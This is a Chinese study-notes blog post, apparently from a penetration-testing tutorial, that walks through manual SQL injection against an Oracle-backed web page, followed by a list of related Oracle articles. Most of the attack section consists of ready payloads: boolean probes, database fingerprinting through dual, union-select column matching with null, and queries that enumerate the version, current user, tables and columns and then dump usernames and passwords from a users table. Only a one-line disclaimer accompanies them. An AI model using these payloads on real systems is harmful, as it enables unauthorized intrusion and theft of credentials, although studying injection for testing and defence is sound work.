某教程学习笔记(一):10、oracle数据库注入

简介: 某教程学习笔记(一):10、oracle数据库注入

一、Oracle数据库


一般大型企业都会用到,物流、旅游、航空、银行等等。。。


1、支持多用户、大事务量的处理


2、数据安全性和完整性的有效控制


3、支持分布式数据处理


4、移植性强


二、手动注入


1、判断是否存在


and 1=1 返回正常


and 1=2 返回错误

0a2653c851af460fa595bd959398a8f1.png


2、判断是否是Oracle数据库


and exists(select * from dual)


and exists(select * from user_tables)


返回正常说明是oracle


3、判断数列


order by 2 返回正常,说明有两列


4、联合查询


union select null,null from dual,这里不能写1,2 需要用null替换,然后将每个null用数字和字符替换一下,发现数字就报错,字符不报错


union select 1,null from dual 报错


union select null,1 from dual 报错


union select ‘null’,‘null’ from dual 返回如下界面,这时就可以用下面的查询语句了


5、获取数据库版本


(select banner from sys.v_$Version where rownum=1)

0a2653c851af460fa595bd959398a8f1.png


6、获取连接数据库的当前用户


(select SYS_CONTEXT(‘USERENV’,‘CURRENT_USER’)from dual)

0eacb84100b54626af849e6b562bf92a.png


7、获取数据库


(select instance_name from v$instance) 获取当前数据库

2d65d23f6d4748949b924e4057485923.png


(select owner from all_tables where rownum=1)获取第一个数据库

2e9b90b2ca334476abebe75bafe6eeaa.png


(select owner from all_tables where rownum=1 and owner<>‘SYS’)获取第二个数据库


8、获取表名


(select table_name from user_tables where rownum=1 and table_name like ‘%users%’) from dual

0a2653c851af460fa595bd959398a8f1.png


10、获取列名


(select column_name from user_tab_columns where table_name=‘sns_users’ and rownum=1)

0eacb84100b54626af849e6b562bf92a.png


11、获取第二列名


(select column_name from user_tab_columns where table_name=‘sns_users’ and rownum=1 and column_name<>‘USER_NAME’)


12、获取字段内容


id=1 and 1=2 union select USER_NAME,USER_PWD from “sns_users”

2d65d23f6d4748949b924e4057485923.png

union select USER_NAME,USER_PWD from “sns_users” where USER_NAME<>‘hu’ 获取第二个用户信息


禁止非法,后果自负

目录
相关文章
|
20天前
|
Oracle 关系型数据库 Linux
【赵渝强老师】Oracle数据库配置助手:DBCA
Oracle数据库配置助手(DBCA)是用于创建和配置Oracle数据库的工具,支持图形界面和静默执行模式。本文介绍了使用DBCA在Linux环境下创建数据库的完整步骤,包括选择数据库操作类型、配置存储与网络选项、设置管理密码等,并提供了界面截图与视频讲解,帮助用户快速掌握数据库创建流程。
201 93
|
3月前
|
存储 Oracle 关系型数据库
服务器数据恢复—光纤存储上oracle数据库数据恢复案例
一台光纤服务器存储上有16块FC硬盘,上层部署了Oracle数据库。服务器存储前面板2个硬盘指示灯显示异常,存储映射到linux操作系统上的卷挂载不上,业务中断。 通过storage manager查看存储状态,发现逻辑卷状态失败。再查看物理磁盘状态,发现其中一块盘报告“警告”,硬盘指示灯显示异常的2块盘报告“失败”。 将当前存储的完整日志状态备份下来,解析备份出来的存储日志并获得了关于逻辑卷结构的部分信息。
|
20天前
|
缓存 Java 应用服务中间件
Spring Boot配置优化:Tomcat+数据库+缓存+日志,全场景教程
本文详解Spring Boot十大核心配置优化技巧,涵盖Tomcat连接池、数据库连接池、Jackson时区、日志管理、缓存策略、异步线程池等关键配置,结合代码示例与通俗解释,助你轻松掌握高并发场景下的性能调优方法,适用于实际项目落地。
216 4
|
1月前
|
SQL Oracle 关系型数据库
Oracle数据库创建表空间和索引的SQL语法示例
以上SQL语法提供了一种标准方式去组织Oracle数据库内部结构,并且通过合理使用可以显著改善查询速度及整体性能。需要注意,在实际应用过程当中应该根据具体业务需求、系统资源状况以及预期目标去合理规划并调整参数设置以达到最佳效果。
105 8
|
3月前
|
SQL Oracle 关系型数据库
比较MySQL和Oracle数据库系统,特别是在进行分页查询的方法上的不同
两者的性能差异将取决于数据量大小、索引优化、查询设计以及具体版本的数据库服务器。考虑硬件资源、数据库设计和具体需求对于实现优化的分页查询至关重要。开发者和数据库管理员需要根据自身使用的具体数据库系统版本和环境,选择最合适的分页机制,并进行必要的性能调优来满足应用需求。
132 11
|
3月前
|
Oracle 关系型数据库 数据库
数据库数据恢复—服务器异常断电导致Oracle数据库报错的数据恢复案例
Oracle数据库故障: 某公司一台服务器上部署Oracle数据库。服务器意外断电导致数据库报错,报错内容为“system01.dbf需要更多的恢复来保持一致性”。该Oracle数据库没有备份,仅有一些断断续续的归档日志。 Oracle数据库恢复流程: 1、检测数据库故障情况; 2、尝试挂起并修复数据库; 3、解析数据库文件; 4、导出并验证恢复的数据库文件。
|
3月前
|
存储 Oracle 关系型数据库
【赵渝强老师】Oracle RMAN的目录数据库
Oracle RMAN默认将备份元信息存储在控制文件中,但控制文件损坏或丢失会导致恢复失败,且备份增多会使控制文件无限增长。为解决这些问题,Oracle引入了RMAN目录数据库(Catalog Database),专门用于存储RMAN备份的元信息。使用目录数据库可提升备份管理效率,支持多数据库共享、长期备份历史记录存储,并可保存RMAN脚本。本文详细介绍了如何创建目录数据库、注册目标数据库及其操作步骤。
|
Oracle 关系型数据库 PHP
|
6月前
|
Oracle 安全 关系型数据库
【Oracle】使用Navicat Premium连接Oracle数据库两种方法
以上就是两种使用Navicat Premium连接Oracle数据库的方法介绍,希望对你有所帮助!
1191 28
|
4月前
|
存储 Oracle 关系型数据库
oracle数据恢复—oracle数据库执行错误truncate命令的数据恢复案例
oracle数据库误执行truncate命令导致数据丢失是一种常见情况。通常情况下,oracle数据库误操作删除数据只需要通过备份恢复数据即可。也会碰到一些特殊情况,例如数据库备份无法使用或者还原报错等。下面和大家分享一例oracle数据库误执行truncate命令导致数据丢失的数据库数据恢复过程。

热门文章

最新文章

推荐镜像

更多